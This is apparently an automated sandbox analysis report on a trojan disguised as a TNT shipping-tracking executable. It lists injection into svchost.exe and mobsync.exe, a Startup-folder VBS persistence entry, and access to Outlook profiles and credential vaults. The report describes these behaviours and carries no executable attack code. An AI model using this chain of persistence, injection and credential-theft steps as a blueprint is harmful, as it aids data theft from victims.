                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_0040FE0A
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_0040FE13
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_004167C3
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_004167BF
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03C003E6
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03B4E3F0
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03BFA352
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03BC02C0
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03BE0274
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03BF41A2
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03C001AA
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03BF81CC
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03BDA118
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03B30100
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03BC8158
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03BD2000
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03B3C7C0
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03B40770
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03B64750
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03B5C6E0
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03C00591
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03B40535
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03BEE4F6
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03BE4420
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03BF2446
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03BF6BD7
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03BFAB40
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03B3EA80
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03B429A0
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03C0A9A6
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03B56962
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03B268B8
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03B6E8F0
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03B4A840
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03B42840
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03BBEFA0
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03B4CFE0
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03B32FC8
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03B60F30
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03BE2F30
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03B82F28
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03BB4F40
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03B52E90
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03BFCE93
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03BFEEDB
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03BFEE26
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03B40E59
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03B58DBF
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03B3ADE0
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03BDCD1F
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03B4AD00
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03BE0CB5
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03B30CF2
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03B40C00
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03B8739A
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03BF132D
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03B2D34C
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03B452A0
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03BE12ED
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03B5B2C0
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03B4B1B0
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03C0B16B
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03B2F172
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03B7516C
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03BF70E9
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03BFF0E0
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03BEF0CC
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03B470C0
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03BFF7B0
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03BF16CC
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03B85630
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03C095C3
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03BDD5B0
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03BF7571
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03BFF43F
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03B31460
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03B5FB80
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03BB5BF0
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03B7DBF9
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03BFFB76
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03BDDAAC
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03B85AA0
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03BE1AA3
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03BEDAC6
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03BB3A6C
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03BFFA49
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03BF7A46
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03BD5910
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03B49950
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03B5B950
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03B438E0
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03BAD800
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03BFFFB1
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03B41F92
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03B03FD2
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03B03FD5
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03BFFF09
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03B49EB0
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03B5FDC0
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03BF7D73
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03BF1D5A
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03B43D40
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03BFFCF2
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03BB9C32
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03BAEA12 appears 86 times
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03B75130 appears 58 times
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03BBF290 appears 105 times
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03B2B970 appears 280 times
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03B87E54 appears 111 times
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe Code function: String function: 00EC7DE1 appears 35 times
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe Code function: String function: 00EE8900 appears 42 times
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe Code function: String function: 00EE0AE3 appears 70 times
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe Code function: String function: 001E8900 appears 42 times
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe Code function: String function: 001E0AE3 appears 70 times
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe Code function: String function: 001C7DE1 appears 35 times
                    Source: TNT AWB TRACKING DETAILS.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winEXE@14/11@5/3
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe Code function: 0_2_00F2A06A GetLastError,FormatMessageW
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe Code function: 0_2_00F181CB AdjustTokenPrivileges,CloseHandle
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe Code function: 0_2_00F187E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe Code function: 2_2_002181CB AdjustTokenPrivileges,CloseHandle
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe Code function: 2_2_002187E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe Code function: 0_2_00F2B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe Code function: 0_2_00F3EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe Code function: 0_2_00F383BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe Code function: 0_2_00EC4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe File created: C:\Users\user\AppData\Local\hurtling
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe File created: C:\Users\user\AppData\Local\Temp\aut73E7.tmp
                    Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jailkeeper.vbs"
                    Source: TNT AWB TRACKING DETAILS.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: mobsync.exe, 0000000A.00000003.2860650086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000A.00000003.2858035680.000000000336A000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000A.00000003.2858035680.0000000003348000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000A.00000002.3366789394.0000000003398000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000A.00000002.3366789394.000000000336A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: TNT AWB TRACKING DETAILS.exe ReversingLabs: Detection: 57%
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe File read: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe
                    Source: unknown Process created: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe"
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe Process created: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe"
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe"
                    Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jailkeeper.vbs"
                    Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe "C:\Users\user\AppData\Local\hurtling\jailkeeper.exe"
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\hurtling\jailkeeper.exe"
                    Source: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exe Process created: C:\Windows\SysWOW64\mobsync.exe "C:\Windows\SysWOW64\mobsync.exe"
                    Source: C:\Windows\SysWOW64\mobsync.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe Process created: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe"
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe"
                    Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe "C:\Users\user\AppData\Local\hurtling\jailkeeper.exe"
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\hurtling\jailkeeper.exe"
                    Source: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exe Process created: C:\Windows\SysWOW64\mobsync.exe "C:\Windows\SysWOW64\mobsync.exe"
                    Source: C:\Windows\SysWOW64\mobsync.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe Section loaded: wsock32.dll
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe Section loaded: version.dll
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe Section loaded: winmm.dll
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe Section loaded: mpr.dll
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe Section loaded: wininet.dll
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe Section loaded: iphlpapi.dll
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe Section loaded: userenv.dll
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe Section loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe Section loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe Section loaded: wldp.dll
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe Section loaded: ntmarta.dll
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe Section loaded: cryptsp.dll
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe Section loaded: rsaenh.dll
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe Section loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe Section loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe Section loaded: wsock32.dll
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe Section loaded: version.dll
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe Section loaded: winmm.dll
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe Section loaded: mpr.dll
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe Section loaded: wininet.dll
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe Section loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe Section loaded: userenv.dll
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe Section loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe Section loaded: wldp.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
                    Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe Section loaded: wsock32.dll
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe Section loaded: version.dll
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe Section loaded: winmm.dll
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe Section loaded: mpr.dll
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe Section loaded: wininet.dll
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe Section loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe Section loaded: userenv.dll
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe Section loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe Section loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe Section loaded: ntmarta.dll
                    Source: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exe Section loaded: wininet.dll
                    Source: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exe Section loaded: mswsock.dll
                    Source: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exe Section loaded: dnsapi.dll
                    Source: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exe Section loaded: iphlpapi.dll
                    Source: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exe Section loaded: fwpuclnt.dll
                    Source: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exe Section loaded: rasadhlp.dll
                    Source: C:\Windows\SysWOW64\mobsync.exe Section loaded: wininet.dll
                    Source: C:\Windows\SysWOW64\mobsync.exe Section loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\mobsync.exe Section loaded: uxtheme.dll
                    Source: C:\Windows\SysWOW64\mobsync.exe Section loaded: ieframe.dll
                    Source: C:\Windows\SysWOW64\mobsync.exe Section loaded: iertutil.dll
                    Source: C:\Windows\SysWOW64\mobsync.exe Section loaded: netapi32.dll
                    Source: C:\Windows\SysWOW64\mobsync.exe Section loaded: version.dll
                    Source: C:\Windows\SysWOW64\mobsync.exe Section loaded: userenv.dll
                    Source: C:\Windows\SysWOW64\mobsync.exe Section loaded: winhttp.dll
                    Source: C:\Windows\SysWOW64\mobsync.exe Section loaded: wkscli.dll
                    Source: C:\Windows\SysWOW64\mobsync.exe Section loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\mobsync.exe Section loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\mobsync.exe Section loaded: windows.storage.dll
                    Source: C:\Windows\SysWOW64\mobsync.exe Section loaded: wldp.dll
                    Source: C:\Windows\SysWOW64\mobsync.exe Section loaded: profapi.dll
                    Source: C:\Windows\SysWOW64\mobsync.exe Section loaded: secur32.dll
                    Source: C:\Windows\SysWOW64\mobsync.exe Section loaded: mlang.dll
                    Source: C:\Windows\SysWOW64\mobsync.exe Section loaded: propsys.dll
                    Source: C:\Windows\SysWOW64\mobsync.exe Section loaded: winsqlite3.dll
                    Source: C:\Windows\SysWOW64\mobsync.exe Section loaded: vaultcli.dll
                    Source: C:\Windows\SysWOW64\mobsync.exe Section loaded: wintypes.dll
                    Source: C:\Windows\SysWOW64\mobsync.exe Section loaded: dpapi.dll
                    Source: C:\Windows\SysWOW64\mobsync.exe Section loaded: cryptbase.dll
                    Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
                    Source: C:\Windows\SysWOW64\mobsync.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                    Source: TNT AWB TRACKING DETAILS.exe Static file information: File size 1169920 > 1048576
                    Source: TNT AWB TRACKING DETAILS.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                    Source: TNT AWB TRACKING DETAILS.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                    Source: TNT AWB TRACKING DETAILS.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                    Source: TNT AWB TRACKING DETAILS.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: TNT AWB TRACKING DETAILS.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                    Source: TNT AWB TRACKING DETAILS.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                    Source: TNT AWB TRACKING DETAILS.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: mobsync.pdbGCTL source: svchost.exe, 00000003.00000003.2630678444.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2630522775.000000000341B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2630705892.0000000003431000.00000004.00000020.00020000.00000000.sdmp, bRQIkEscRm.exe, 00000009.00000003.2747438856.0000000001101000.00000004.00000001.00020000.00000000.sdmp, bRQIkEscRm.exe, 00000009.00000003.2611735467.00000000010EB000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: bRQIkEscRm.exe, 00000009.00000002.3366053235.00000000007CE000.00000002.00000001.01000000.00000007.sdmp
                    Source: Binary string: wntdll.pdbUGP source: jailkeeper.exe, 00000002.00000003.2154686403.00000000036D0000.00000004.00001000.00020000.00000000.sdmp, jailkeeper.exe, 00000002.00000003.2155085204.0000000003530000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2675149274.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2557720740.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2560047406.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2675149274.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, jailkeeper.exe, 00000005.00000003.2267441027.0000000003520000.00000004.00001000.00020000.00000000.sdmp, jailkeeper.exe, 00000005.00000003.2283959181.0000000003710000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2686393797.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2677219601.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2686393797.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2681110501.0000000003300000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000A.00000002.3371145255.0000000005110000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 0000000A.00000002.3371145255.00000000052AE000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 0000000A.00000003.2674544260.0000000004F66000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000A.00000003.2672194568.0000000004DB6000.00000004.00000020.00020000.00000000.sdmp
